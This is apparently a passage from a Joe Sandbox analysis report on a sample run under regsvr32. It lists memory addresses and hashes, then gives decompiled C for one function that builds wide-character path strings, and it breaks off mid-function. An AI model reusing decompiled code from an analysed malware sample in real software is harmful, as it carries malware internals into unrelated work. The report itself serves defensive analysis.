0x0048358e
0x004832c8
0x004832cc
0x004832cc
0x004832ce
0x004832d2
0x004832d4
0x004832d4
0x004832d8
0x00000000
0x00000000
0x004832da
0x004832db
0x004832dd
0x00000000
0x00000000
0x00000000
0x004832dd
0x00000000
0x004832d4
0x00483595
0x00483599
0x0048359d
0x0048359f
0x00000000
0x00000000
0x004835a5
0x004835a9
0x004835ad
0x004835b1
0x004835b5
0x004835b5
0x004835b7
0x004835b9
0x004835d2
0x004835e2
0x004835e2
0x004835e8
0x004835e8
0x004835ed
0x004835f1
0x004835f5
0x004835f7
0x00000000
0x00000000
0x004835fd
0x00483600
0x00483602
0x00000000
0x00000000
0x00483608
0x0048360e
0x00483627
0x00483627
0x0048362c
0x0048362c
0x0048362f
0x0048362f
0x00483631
0x00483635
0x00483639
0x0048363d
0x00483644
0x0048364d
0x00483650
0x00483653
0x00483659
0x0048365c
0x0048365f
0x00483661
0x00000000
0x00000000
0x00483665
0x00483667
0x00483673
0x00483673
0x00483677
0x0048367b
0x0048367b
0x0048367d
0x00000000
0x00000000
0x00000000
0x0048367d
0x00483669
0x0048366a
0x0048366d
0x00000000
0x00000000
0x00000000
0x0048366d
0x0048368f
0x00483699
0x00483699
0x0048369a
0x00000000
0x00000000
0x0048369c
0x004836a5
0x004836aa
0x004836ad
0x004836b1
0x00000000
0x00000000
0x004836b3
0x004836b7
0x004836b7
0x004836b8
0x004836b9
0x004836c3
0x004836c9
0x004836cc
0x004836ce
0x00000000
0x00000000
0x004836d0
0x004836d3
0x00000000
0x00000000
0x00000000
0x004836d5
0x00000000
0x004836b7
0x00483610
0x00483614
0x00483614
0x00483618
0x00000000
0x00000000
0x0048361e
0x0048361f
0x00483625
0x00000000
0x00000000
0x00000000
0x00483625
0x004836fa
0x004836fa
0x004836fc
0x00000000
0x00000000
0x00483702
0x00000000
0x00000000
0x00483708
0x0048370c
0x00483710
0x00000000
0x00483710
0x00483719
0x00483720
0x00000000
0x00483720
0x004835bb
0x004835bf
0x004835c1
0x004835c1
0x004835c3
0x004835c3
0x004835c7
0x00000000
0x00000000
0x004835cd
0x004835ce
0x004835d0
0x00000000
0x00000000
0x00000000
0x004835d0
0x00000000
0x004836de
0x004836de
0x004836e2
0x004836e6
0x004836e6
0x004836ee
0x004836ee
0x004836f2
0x00000000
0x004836f2
0x00483683
0x00483683
0x00000000
0x00483687
0x0048324e
0x0048324f
0x00483252
0x00000000
0x00000000
0x00000000
0x00483252
0x00483724
0x0048372e
0x0048372e
0x0048372f
0x00000000
0x00000000
0x00483735
0x0048373e
0x00483743
0x00483746
0x0048374a
0x00000000
0x00000000
0x00483750
0x00483754
0x00483754
0x00483755
0x00483756
0x00483760
0x00483766
0x00483769
0x0048376b
0x00000000
0x00000000
0x0048376d
0x00483770
0x00000000
0x00000000
0x00000000
0x00483772
0x00000000
0x00483754
0x004831ed
0x004831f1
0x004831f1
0x004831f5
0x00000000
0x00000000
0x004831fb
0x004831fc
0x00483202
0x00000000
0x00000000
0x00000000
0x00483202
0x00483777
0x00483777
0x00483779
0x00000000
0x00000000
0x0048377f
0x00000000
0x00000000
0x00483785
0x00483789
0x00000000
0x00483789
0x00483791
0x00483798
0x00000000
0x00483798
0x00483198
0x0048319c
0x0048319e
0x0048319e
0x004831a0
0x004831a0
0x004831a4
0x00000000
0x00000000
0x004831aa
0x004831ab
0x004831ad
0x00000000
0x00000000
0x00000000
0x004831ad
0x00000000
0x0048379c
0x0048379c
0x004837a0
0x004837a4
0x004837a4
0x00000000
0x004837ac
0x00000000
0x0048303b
0x00482fb7
0x00482fba
0x00482fbc
0x00482fbe
0x00000000
0x00000000
0x00482fc0
0x00482fc4
0x00482fc4
0x00482fc6
0x00482fca
0x00482fcd
0x00482fcd
0x00482fce
0x00482fd3
0x00482fd7
0x00482fd9
0x00000000
0x00000000
0x00482fdb
0x00482fdf
0x00482fe2
0x00482fe4
0x00000000
0x00000000
0x00000000
0x00482fe4
0x00482fe6
0x00482fea
0x00482fee
0x00000000
0x00482fee
0x00482fb1
0x00482f6f
0x00000000
0x00482f6f
0x00482eeb
0x00482eeb
0x00482eee
0x00482f06
0x00482f0a
0x00482f16
0x00482f16
0x00482f1c
0x00482f1c
0x00482f21
0x00482f25
0x00482f29
0x00482f2b
0x00000000
0x00000000
0x00482f31
0x00482f34
0x00482f36
0x00000000
0x00000000
0x00482f38
0x00482f3e
0x00482f53
0x00482f53
0x00482f58
0x00000000
0x00000000
0x00000000
0x00000000
0x00482f40
0x00482f40
0x00482f40
0x00482f44
0x00000000
0x00000000
0x00482f4a
0x00482f4b
0x00482f51
0x00000000
0x00000000
0x00000000
0x00482f51
0x004837b1
0x004837b1
0x004837b4
0x004837c2
0x004837b6
0x004837b6
0x004837b9
0x004837b9
0x00000000
0x004837b4
0x004837cc
0x004837cf
0x00000000
0x004837cf
0x00482ef2
0x00482ef4
0x00482ef4
0x00482ef7
0x00482ef7
0x00482efb
0x00000000
0x00000000
0x00482f01
0x00482f02
0x00482f04
0x00000000
0x00000000
0x00000000
0x00482f04
0x00000000
0x00482ef7
0x00482ed8
0x00000000
0x00482ed8
0x00482e8e
0x00482eb4
0x00482eb4
0x00482eb6
0x00482eb7
0x00482ebc
0x00000000
0x00482ebc
0x00482e90
0x00482e93
0x00482e97
0x00000000
0x00000000
0x00482e99
0x00482e9b
0x00482e9b
0x00482e9c
0x00482ea1
0x00482ea7
0x00000000
0x00000000
0x00482ea9
0x00482ead
0x00482eb2
0x00000000
0x00000000
0x00000000
0x00482eb2
0x00000000

Strings

@, xrefs: 00482EC8

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 115c3439d82789a76028cc64ba03a0b0cd7b01c7d0591427b9fbd30026037de6
Instruction ID: c68b1bacd66bea113f589baf692b999fa6e4f5662c3ff11ef8d84091b00ffe04
Opcode Fuzzy Hash: 115c3439d82789a76028cc64ba03a0b0cd7b01c7d0591427b9fbd30026037de6
Instruction Fuzzy Hash: 7A5239719083924BC725DE2CC48032FBBE26FC6B15F188E5EE8955B396D738CE418786

Uniqueness

Uniqueness Score: -1.00%

Function 0047D030, Relevance: 2.0, Strings: 1, Instructions: 789
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0047D030(void* __ecx, signed int* _a4) {
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _t225;
				signed int _t230;
				signed int _t231;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t255;
				signed int _t257;
				signed int _t258;
				unsigned int _t267;
				signed int _t272;
				signed int _t277;
				unsigned int _t283;
				signed int _t284;
				signed int* _t286;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t304;
				unsigned int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t312;
				signed int _t313;
				signed int _t316;
				signed int _t317;
				unsigned int _t326;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				void* _t331;
				signed int _t332;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				unsigned int _t341;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				signed int _t351;
				signed int _t354;
				signed int _t355;
				signed int _t361;
				signed int _t362;
				signed int _t364;
				unsigned int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t374;
				void* _t382;
				signed int _t384;
				signed int _t385;
				signed int _t389;
				signed int _t390;
				unsigned int _t405;
				signed int _t406;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed short* _t414;
				signed int _t418;
				unsigned int _t419;
				signed int _t421;
				unsigned int _t429;
				void* _t433;
				signed int _t434;
				signed int _t435;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int* _t445;
				unsigned int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t458;
				signed int _t465;
				unsigned int _t467;
				signed int _t468;
				signed int _t471;
				void* _t473;
				void* _t474;

				_t473 = (_t471 & 0xfffffff0) - 0x34;
				E0047D980(__ecx,  &_v60, 0x2f);
				_t294 = E0047E7D0( &_v60);
				_t445 = _a4;
				_t316 =  *_t294;
				if(_t316 != 0) {
					_t364 =  *( *( *(_t294 + 4)));
					__eflags = _t364;
					if(_t364 == 0) {
						L37:
						_push(0x80);
						_t418 = E00471030();
						_t473 = _t473 + 4;
						 *_t418 = 0;
						__eflags =  *_t294 - 1;
						if( *_t294 <= 1) {
							L70:
							 *_t445 = 0;
							_t445[1] = 0;
							__eflags = _t418;
							if(_t418 == 0) {
								L105:
								_push(0x80);
								_t295 = E00471030();
								_t473 = _t473 + 4;
								_t317 =  *_t445;
								__eflags = _t317;
								if(_t317 == 0) {
									__eflags = 0;
									 *_t295 = 0;
									L113:
									 *_t445 = _t295;
									_t445[1] = 0x40;
									L114:
									_push(2);
									_push(_t418);
									E004710B0();
									_t474 = _t473 + 8;
									L115:
									_t419 = _v60;
									_v60 = 0;
									_v52 = 0;
									_t369 = _v56;
									if(_t419 <= 0) {
										L127:
										_push(4);
										_push(_t369);
										E004710B0();
										_v56 = 0;
										return _t445;
									}
									_t225 = _t419 >> 1;
									if(_t225 == 0) {
										_t297 = 1;
										L124:
										if(_t297 - 1 < _t419) {
											_t319 =  *((intOrPtr*)(_t369 + _t297 * 4 - 4));
											if( *((intOrPtr*)(_t369 + _t297 * 4 - 4)) != 0) {
												_push(1);
												E004787E0(_t319);
												_t369 = _v60;
											}
										}
										goto L127;
									}
									_t298 = 0;
									_t447 = _t225;
									do {
										_t320 =  *((intOrPtr*)(_t369 + _t298 * 8));
										if( *((intOrPtr*)(_t369 + _t298 * 8)) != 0) {
											_push(1);
											E004787E0(_t320);
											_t369 = _v60;
										}
										_t321 =  *((intOrPtr*)(_t369 + 4 + _t298 * 8));
										if( *((intOrPtr*)(_t369 + 4 + _t298 * 8)) != 0) {
											_push(1);
											E004787E0(_t321);
											_t369 = _v60;
										}
										_t298 = _t298 + 1;
									} while (_t298 < _t447);
									_t445 = _a4;
									_t297 = _t298 + _t298 + 1;
									goto L124;
								}
								__eflags = _t295;
								if(_t295 == 0) {
									L111:
									_push(2);
									_push(_t317);
									E004710B0();
									_t473 = _t473 + 8;
									goto L113;
								}
								_t370 =  *_t317 & 0x0000ffff;
								 *_t295 = _t370;
								__eflags = _t370;
								if(_t370 == 0) {
									goto L111;
								}
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_t371 = _t371 + 1;
									_t230 =  *(_t317 + _t371 * 4 - 2) & 0x0000ffff;
									 *(_t295 + _t371 * 4 - 2) = _t230;
									__eflags = _t230;
									if(_t230 == 0) {
										goto L111;
									}
									_t231 =  *(_t317 + _t371 * 4) & 0x0000ffff;
									 *(_t295 + _t371 * 4) = _t231;
									__eflags = _t231;
									if(_t231 != 0) {
										continue;
									}
									goto L111;
								}
								goto L111;
							}
							L71:
							__eflags =  *_t418 & 0x0000ffff;
							if(( *_t418 & 0x0000ffff) == 0) {
								goto L105;
							}
							_t374 = _t418 & 0x0000000f;
							__eflags = _t374;
							if(_t374 == 0) {
								L77:
								asm("pxor xmm0, xmm0");
								_t304 =  ~( ~_t374 + 0x00000007 & 0x00000007) + 0x7fffffff;
								__eflags = _t304;
								while(1) {
									asm("movdqu xmm1, [edi+edx*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb ecx, xmm1");
									__eflags = _t316;
									if(_t316 != 0) {
										break;
									}
									_t374 = _t374 + 8;
									__eflags = _t374 - _t304;
									if(_t374 < _t304) {
										continue;
									}
									__eflags = _t304 - 0x7fffffff;
									if(_t304 >= 0x7fffffff) {
										L83:
										_t304 = 0x7fffffff;
										L84:
										_t82 = _t304 + 1; // 0x80000000
										_t232 = _t82;
										__eflags = _t232 - 0x40;
										_t233 =  <=  ? 0x40 : _t232;
										__eflags = _t233;
										if(_t233 > 0) {
											_t326 = (_t233 >> 5 >> 0x1a) + _t233 >> 6;
											_t234 = _t233 & 0x8000003f;
											__eflags = _t234;
											if(_t234 < 0) {
												_t234 = (_t234 - 0x00000001 | 0xffffffc0) + 1;
												__eflags = _t234;
											}
											__eflags = _t234;
											_t327 = _t326 + (0 | _t234 > 0x00000000);
											_v64 = _t327 << 6;
											_push(_t327 << 7);
											_t235 = E00471030();
											_t473 = _t473 + 4;
											_t329 =  *_t445;
											__eflags = _t329;
											if(_t329 == 0) {
												__eflags = 0;
												 *_t235 = 0;
												goto L97;
											} else {
												__eflags = _t235;
												if(_t235 == 0) {
													L95:
													_push(2);
													_push(_t329);
													_v68 = _t235;
													E004710B0();
													_t235 = _v68;
													_t473 = _t473 + 8;
													L97:
													_t445[1] = _v64;
													 *_t445 = _t235;
													L98:
													_t330 = _t418;
													__eflags = _t235;
													if(_t235 == 0) {
														goto L114;
													}
													_t382 = 0;
													while(1) {
														_t448 =  *_t330 & 0x0000ffff;
														_t382 = _t382 + 1;
														 *_t235 = _t448;
														__eflags = _t304;
														if(_t304 == 0) {
															goto L103;
														}
														__eflags = _t382 - _t304;
														if(_t382 == _t304) {
															_t445 = _a4;
															 *(_t235 + 2) = 0;
															goto L114;
														}
														L103:
														__eflags = _t448;
														if(_t448 == 0) {
															_t445 = _a4;
															goto L114;
														}
														_t235 = _t235 + 2;
														_t330 = _t330 + 2;
														__eflags = _t330;
													}
												}
												_t384 =  *_t329 & 0x0000ffff;
												 *_t235 = _t384;
												__eflags = _t384;
												if(_t384 == 0) {
													goto L95;
												}
												_t385 = 0;
												__eflags = 0;
												while(1) {
													_t385 = _t385 + 1;
													_t449 =  *(_t329 + _t385 * 4 - 2) & 0x0000ffff;
													 *(_t235 + _t385 * 4 - 2) = _t449;
													__eflags = _t449;
													if(_t449 == 0) {
														break;
													}
													_t450 =  *(_t329 + _t385 * 4) & 0x0000ffff;
													 *(_t235 + _t385 * 4) = _t450;
													__eflags = _t450;
													if(_t450 != 0) {
														continue;
													}
													break;
												}
												_t445 = _a4;
												goto L95;
											}
										}
										_t235 = 0;
										goto L98;
									} else {
										goto L81;
									}
									while(1) {
										L81:
										__eflags =  *(_t418 + _t304 * 2) & 0x0000ffff;
										if(( *(_t418 + _t304 * 2) & 0x0000ffff) == 0) {
											goto L84;
										}
										_t304 = _t304 + 1;
										__eflags = _t304 - 0x7fffffff;
										if(_t304 < 0x7fffffff) {
											continue;
										}
										goto L83;
									}
									goto L84;
								}
								asm("bsf ebx, ecx");
								_t304 = (_t304 >> 1) + _t374;
								goto L84;
							}
							_t304 = 0;
							__eflags = _t374 & 0x00000001;
							if((_t374 & 0x00000001) != 0) {
								goto L81;
							}
							_t374 =  ~_t374 + 0x10 >> 1;
							__eflags = _t374;
							while(1) {
								_t316 =  *(_t418 + _t304 * 2) & 0x0000ffff;
								__eflags = _t316;
								if(_t316 == 0) {
									goto L84;
								}
								_t304 = _t304 + 1;
								__eflags = _t304 - _t374;
								if(_t304 < _t374) {
									continue;
								}
								goto L77;
							}
							goto L84;
						}
						_v40 = 0x40;
						L39:
						__eflags = 1;
						_t389 = 1;
						_t241 = _t294;
						asm("pxor xmm0, xmm0");
						_t306 = 1;
						do {
							__eflags = _t418;
							if(_t418 == 0) {
								_t390 = 0;
								L205:
								_v32 = _t241;
								_t451 = _t390;
								L54:
								_t48 = _t451 + 2; // -2147483652
								_t331 = _t48;
								__eflags = _t331 - 0x40;
								_t332 =  <=  ? 0x40 : _t331;
								__eflags = _t332 - _v40;
								if(_t332 <= _v40) {
									L66:
									_t316 = 0;
									 *((short*)(_t418 + _t451 * 2)) = 0x5c;
									 *((short*)(_t418 + 2 + _t451 * 2)) = 0;
									_t452 = _v32;
									_t389 =  *( *( *((intOrPtr*)(_t452 + 4)) + _t306 * 4));
									__eflags = _t389;
									if(_t389 == 0) {
										goto L68;
									}
									_t316 =  *_t389 & 0x0000ffff;
									__eflags = _t316;
									if(_t316 != 0) {
										__eflags = _t389 - _t418;
										if(_t389 == _t418) {
											goto L68;
										}
										_t245 = _t389 & 0x0000000f;
										__eflags = _t245;
										if(_t245 == 0) {
											L134:
											asm("pxor xmm1, xmm1");
											_t465 =  ~( ~_t245 + 0x00000007 & 0x00000007) + 0x7fffffff;
											__eflags = _t465;
											while(1) {
												asm("movdqu xmm0, [edx+eax*2]");
												asm("pcmpeqw xmm0, xmm1");
												asm("pmovmskb ecx, xmm0");
												__eflags = _t316;
												if(_t316 != 0) {
													break;
												}
												_t245 = _t245 + 8;
												__eflags = _t245 - _t465;
												if(_t245 < _t465) {
													continue;
												}
												__eflags = _t465 - 0x7fffffff;
												if(_t465 >= 0x7fffffff) {
													L140:
													_t465 = 0x7fffffff;
													L141:
													__eflags = _t418;
													if(_t418 == 0) {
														_t246 = 0;
														L155:
														_t149 = _t246 + 1; // 0x80000000
														_t247 = _t465 + _t149;
														__eflags = _t247;
														if(_t247 != 0) {
															__eflags = _t247 - 0x40;
															_t248 =  <=  ? 0x40 : _t247;
															__eflags = _t248 - _v40;
															if(_t248 <= _v40) {
																L173:
																_t249 = _t418;
																__eflags = _t418;
																if(_t418 == 0) {
																	L204:
																	_t241 = _v32;
																	_t390 = 0;
																	_t306 = _t306 + 1;
																	__eflags = _t306 -  *_t241;
																	if(_t306 >=  *_t241) {
																		_t445 = _a4;
																		 *_t445 = 0;
																		_t445[1] = 0;
																		goto L105;
																	}
																	goto L205;
																}
																_t334 =  *_t418 & 0x0000ffff;
																L175:
																__eflags = _t334;
																if(_t334 == 0) {
																	L180:
																	_t335 = _t249;
																	__eflags = _t465;
																	if(__eflags != 0) {
																		if(__eflags <= 0) {
																			L187:
																			_t316 = _v32;
																			_t389 = 0;
																			 *_t249 = 0;
																			_t306 = _t306 + 1;
																			__eflags = _t306 -  *_t316;
																			if(_t306 <  *_t316) {
																				L42:
																				_t243 = _t418 & 0x0000000f;
																				__eflags = _t243;
																				if(_t243 == 0) {
																					L47:
																					asm("pxor xmm1, xmm1");
																					_t458 =  ~( ~_t243 + 0x00000007 & 0x00000007) + 0x7fffffff;
																					__eflags = _t458;
																					while(1) {
																						asm("movdqu xmm0, [edi+eax*2]");
																						asm("pcmpeqw xmm0, xmm1");
																						asm("pmovmskb edx, xmm0");
																						__eflags = _t389;
																						if(_t389 != 0) {
																							break;
																						}
																						_t243 = _t243 + 8;
																						__eflags = _t243 - _t458;
																						if(_t243 < _t458) {
																							continue;
																						}
																						__eflags = _t458 - 0x7fffffff;
																						if(_t458 >= 0x7fffffff) {
																							L53:
																							_t451 = 0x7fffffff;
																							goto L54;
																						} else {
																							goto L51;
																						}
																						while(1) {
																							L51:
																							__eflags =  *(_t418 + _t458 * 2) & 0x0000ffff;
																							if(( *(_t418 + _t458 * 2) & 0x0000ffff) == 0) {
																								break;
																							}
																							_t458 = _t458 + 1;
																							__eflags = _t458 - 0x7fffffff;
																							if(_t458 < 0x7fffffff) {
																								continue;
																							}
																							goto L53;
																						}
																						L196:
																						__eflags = _t451 - 0xfffffffe;
																						if(_t451 == 0xfffffffe) {
																							 *_t418 = 0;
																						}
																						goto L54;
																					}
																					asm("bsf esi, edx");
																					_t451 = (_t458 >> 1) + _t243;
																					goto L196;
																				}
																				_t458 = 0;
																				__eflags = _t243 & 0x00000001;
																				if((_t243 & 0x00000001) != 0) {
																					goto L51;
																				}
																				_t243 =  ~_t243 + 0x10 >> 1;
																				__eflags = _t243;
																				while(1) {
																					_t389 =  *(_t418 + _t458 * 2) & 0x0000ffff;
																					__eflags = _t389;
																					if(_t389 == 0) {
																						goto L196;
																					}
																					_t458 = _t458 + 1;
																					__eflags = _t458 - _t243;
																					if(_t458 < _t243) {
																						continue;
																					}
																					goto L47;
																				}
																				goto L196;
																			}
																			_t445 = _a4;
																			L192:
																			 *_t445 = 0;
																			_t445[1] = 0;
																			goto L71;
																		}
																		L183:
																		_v48 = 0;
																		_v44 = _t418;
																		_v28 = _t306;
																		_t421 = _v48;
																		while(1) {
																			_t307 =  *(_t389 + _t421 * 2) & 0x0000ffff;
																			 *(_t335 + _t421 * 2) = _t307;
																			__eflags = _t307;
																			if(_t307 == 0) {
																				break;
																			}
																			_t190 = _t421 * 2; // 0x2
																			_t249 = _t335 + _t190 + 2;
																			_t421 = _t421 + 1;
																			__eflags = _t421 - _t465;
																			if(_t421 < _t465) {
																				continue;
																			}
																			break;
																		}
																		_t306 = _v28;
																		_t418 = _v44;
																		goto L187;
																	}
																	_t465 = 0x7fffffff;
																	goto L183;
																}
																_v36 = _t389;
																_t336 = 0;
																__eflags = 0;
																_v28 = _t306;
																while(1) {
																	_t336 = _t336 + 1;
																	_t308 = _t418 + _t336 * 4;
																	_t249 = _t308 - 2;
																	__eflags =  *(_t308 - 2) & 0x0000ffff;
																	if(( *(_t308 - 2) & 0x0000ffff) == 0) {
																		break;
																	}
																	_t249 = _t308;
																	__eflags =  *_t308 & 0x0000ffff;
																	if(( *_t308 & 0x0000ffff) != 0) {
																		continue;
																	}
																	break;
																}
																_t389 = _v36;
																_t306 = _v28;
																goto L180;
															}
															L161:
															_t341 = (_t248 >> 5 >> 0x1a) + _t248 >> 6;
															_t250 = _t248 & 0x8000003f;
															__eflags = _t250;
															if(_t250 < 0) {
																_t250 = (_t250 - 0x00000001 | 0xffffffc0) + 1;
																__eflags = _t250;
															}
															__eflags = _t250;
															_t342 = _t341 + (0 | _t250 > 0x00000000);
															_v40 = _t342 << 6;
															_push(_t342 << 7);
															_v36 = _t389;
															_t255 = E00471030();
															_t389 = _v36;
															_t344 = _t255;
															_t473 = _t473 + 4;
															__eflags = _t418;
															if(_t418 == 0) {
																__eflags = 0;
																 *_t344 = 0;
																goto L172;
															} else {
																__eflags = _t344;
																if(_t344 == 0) {
																	L170:
																	_push(2);
																	_push(_t418);
																	_v68 = _t344;
																	_v36 = _t389;
																	E004710B0();
																	_t389 = _v36;
																	_t344 = _v68;
																	_t473 = _t473 + 8;
																	L172:
																	_t418 = _t344;
																	goto L173;
																}
																_t257 =  *_t418 & 0x0000ffff;
																 *_t344 = _t257;
																__eflags = _t257;
																if(_t257 == 0) {
																	goto L170;
																}
																_v28 = _t306;
																_t258 = 0;
																__eflags = 0;
																while(1) {
																	_t258 = _t258 + 1;
																	_t309 =  *(_t418 + _t258 * 4 - 2) & 0x0000ffff;
																	 *(_t344 + _t258 * 4 - 2) = _t309;
																	__eflags = _t309;
																	if(_t309 == 0) {
																		break;
																	}
																	_t310 =  *(_t418 + _t258 * 4) & 0x0000ffff;
																	 *(_t344 + _t258 * 4) = _t310;
																	__eflags = _t310;
																	if(_t310 != 0) {
																		continue;
																	}
																	break;
																}
																_t306 = _v28;
																goto L170;
															}
														}
														__eflags = _t418;
														if(_t418 == 0) {
															__eflags = _v40 - 0x40;
															if(_v40 < 0x40) {
																L159:
																_t248 = 0x40;
																goto L161;
															}
															goto L204;
														}
														_t334 = 0;
														 *_t418 = 0;
														__eflags = _v40 - 0x40;
														if(_v40 < 0x40) {
															goto L159;
														}
														_t249 = _t418;
														goto L175;
													}
													_t346 = _t418 & 0x0000000f;
													__eflags = _t346;
													if(_t346 == 0) {
														L148:
														asm("pxor xmm1, xmm1");
														_v28 = _t306;
														_t246 =  ~( ~_t346 + 0x00000007 & 0x00000007) + 0x7fffffff;
														__eflags = _t246;
														while(1) {
															asm("movdqu xmm0, [edi+ecx*2]");
															asm("pcmpeqw xmm0, xmm1");
															asm("pmovmskb ebx, xmm0");
															__eflags = _t306;
															if(_t306 != 0) {
																break;
															}
															_t346 = _t346 + 8;
															__eflags = _t346 - _t246;
															if(_t346 < _t246) {
																continue;
															}
															_t306 = _v28;
															__eflags = _t246 - 0x7fffffff;
															if(_t246 >= 0x7fffffff) {
																L154:
																_t246 = 0x7fffffff;
																goto L155;
															} else {
																goto L152;
															}
															while(1) {
																L152:
																__eflags =  *(_t418 + _t246 * 2) & 0x0000ffff;
																if(( *(_t418 + _t246 * 2) & 0x0000ffff) == 0) {
																	goto L155;
																}
																_t246 = _t246 + 1;
																__eflags = _t246 - 0x7fffffff;
																if(_t246 < 0x7fffffff) {
																	continue;
																}
																goto L154;
															}
															goto L155;
														}
														asm("bsf eax, eax");
														_t267 = _t306 >> 1;
														_t306 = _v28;
														_t246 = _t267 + _t346;
														goto L155;
													}
													_t246 = 0;
													__eflags = _t346 & 0x00000001;
													if((_t346 & 0x00000001) != 0) {
														goto L152;
													}
													_t346 =  ~_t346 + 0x10 >> 1;
													__eflags = _t346;
													_v28 = _t306;
													while(1) {
														__eflags =  *(_t418 + _t246 * 2) & 0x0000ffff;
														if(( *(_t418 + _t246 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t246 = _t246 + 1;
														__eflags = _t246 - _t346;
														if(_t246 < _t346) {
															continue;
														}
														_t306 = _v28;
														goto L148;
													}
													_t306 = _v28;
													goto L155;
												} else {
													goto L138;
												}
												while(1) {
													L138:
													__eflags =  *(_t389 + _t465 * 2) & 0x0000ffff;
													if(( *(_t389 + _t465 * 2) & 0x0000ffff) == 0) {
														goto L141;
													}
													_t465 = _t465 + 1;
													__eflags = _t465 - 0x7fffffff;
													if(_t465 < 0x7fffffff) {
														continue;
													}
													goto L140;
												}
												goto L141;
											}
											asm("bsf esi, ecx");
											_t465 = (_t465 >> 1) + _t245;
											goto L141;
										}
										_t465 = 0;
										__eflags = _t245 & 0x00000001;
										if((_t245 & 0x00000001) != 0) {
											goto L138;
										}
										_t245 =  ~_t245 + 0x10 >> 1;
										__eflags = _t245;
										while(1) {
											_t316 =  *(_t389 + _t465 * 2) & 0x0000ffff;
											__eflags = _t316;
											if(_t316 == 0) {
												goto L141;
											}
											_t465 = _t465 + 1;
											__eflags = _t465 - _t245;
											if(_t465 < _t245) {
												continue;
											}
											goto L134;
										}
										goto L141;
									}
									goto L68;
								}
								_t405 = (_t332 >> 5 >> 0x1a) + _t332 >> 6;
								_t351 = _t332 & 0x8000003f;
								__eflags = _t351;
								if(_t351 < 0) {
									_t351 = (_t351 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t351;
								}
								__eflags = _t351;
								_t406 = _t405 + (0 | _t351 > 0x00000000);
								_v40 = _t406 << 6;
								_push(_t406 << 7);
								_t272 = E00471030();
								_t473 = _t473 + 4;
								__eflags = _t418;
								if(_t418 == 0) {
									__eflags = 0;
									 *_t272 = 0;
									goto L65;
								} else {
									__eflags = _t272;
									if(_t272 == 0) {
										L63:
										_push(2);
										_push(_t418);
										_v64 = _t272;
										E004710B0();
										_t272 = _v64;
										_t473 = _t473 + 8;
										L65:
										_t418 = _t272;
										goto L66;
									}
									_t409 =  *_t418 & 0x0000ffff;
									 *_t272 = _t409;
									__eflags = _t409;
									if(_t409 == 0) {
										goto L63;
									}
									_t410 = 0;
									__eflags = 0;
									while(1) {
										_t410 = _t410 + 1;
										_t354 =  *(_t418 + _t410 * 4 - 2) & 0x0000ffff;
										 *(_t272 + _t410 * 4 - 2) = _t354;
										__eflags = _t354;
										if(_t354 == 0) {
											goto L63;
										}
										_t355 =  *(_t418 + _t410 * 4) & 0x0000ffff;
										 *(_t272 + _t410 * 4) = _t355;
										__eflags = _t355;
										if(_t355 != 0) {
											continue;
										}
										goto L63;
									}
									goto L63;
								}
							}
							_v32 = _t241;
							goto L42;
							L68:
							_t241 = _t452;
							_t306 = _t306 + 1;
							__eflags = _t306 -  *_t241;
						} while (_t306 <  *_t241);
						_t445 = _a4;
						goto L70;
					}
					__eflags =  *_t364 & 0x0000ffff;
					if(( *_t364 & 0x0000ffff) == 0) {
						goto L37;
					}
					_t277 = _t364 & 0x0000000f;
					__eflags = _t277;
					if(_t277 == 0) {
						L18:
						asm("pxor xmm0, xmm0");
						_t429 =  ~( ~_t277 + 0x00000007 & 0x00000007) + 0x7fffffff;
						__eflags = _t429;
						_v64 = _t429;
						_t467 = _t429;
						while(1) {
							asm("movdqu xmm1, [edx+eax*2]");
							asm("pcmpeqw xmm1, xmm0");
							asm("pmovmskb edi, xmm1");
							__eflags = _t429;
							if(_t429 != 0) {
								break;
							}
							_t277 = _t277 + 8;
							__eflags = _t277 - _t467;
							if(_t277 < _t467) {
								continue;
							}
							_v64 = _t467;
							_t445 = _a4;
							__eflags = _v64 - 0x7fffffff;
							if(_v64 >= 0x7fffffff) {
								L25:
								_v64 = 0x7fffffff;
								L26:
								_t433 = _v64 + 1;
								__eflags = _t433 - 0x40;
								_t434 =  <=  ? 0x40 : _t433;
								__eflags = _t434;
								if(_t434 > 0) {
									_t283 = (_t434 >> 5 >> 0x1a) + _t434 >> 6;
									_t435 = _t434 & 0x8000003f;
									__eflags = _t435;
									if(_t435 < 0) {
										_t435 = (_t435 - 0x00000001 | 0xffffffc0) + 1;
										__eflags = _t435;
									}
									__eflags = _t435;
									_t284 = _t283 + (0 | _t435 > 0x00000000);
									_v40 = _t284 << 6;
									_push(_t284 << 7);
									_v68 = _t364;
									_t286 = E00471030();
									_t411 = _v68;
									_t473 = _t473 + 4;
									_t418 = _t286;
									 *_t286 = 0;
									_v32 = _t294;
									_t468 = _v64;
									while(1) {
										_t312 =  *_t411 & 0x0000ffff;
										_t316 = 1;
										 *_t286 = _t312;
										__eflags = _t468;
										if(_t468 == 0) {
											goto L35;
										}
										__eflags = 1 - _t468;
										if(1 == _t468) {
											__eflags = 0;
											_t445 = _a4;
											_t294 = _v32;
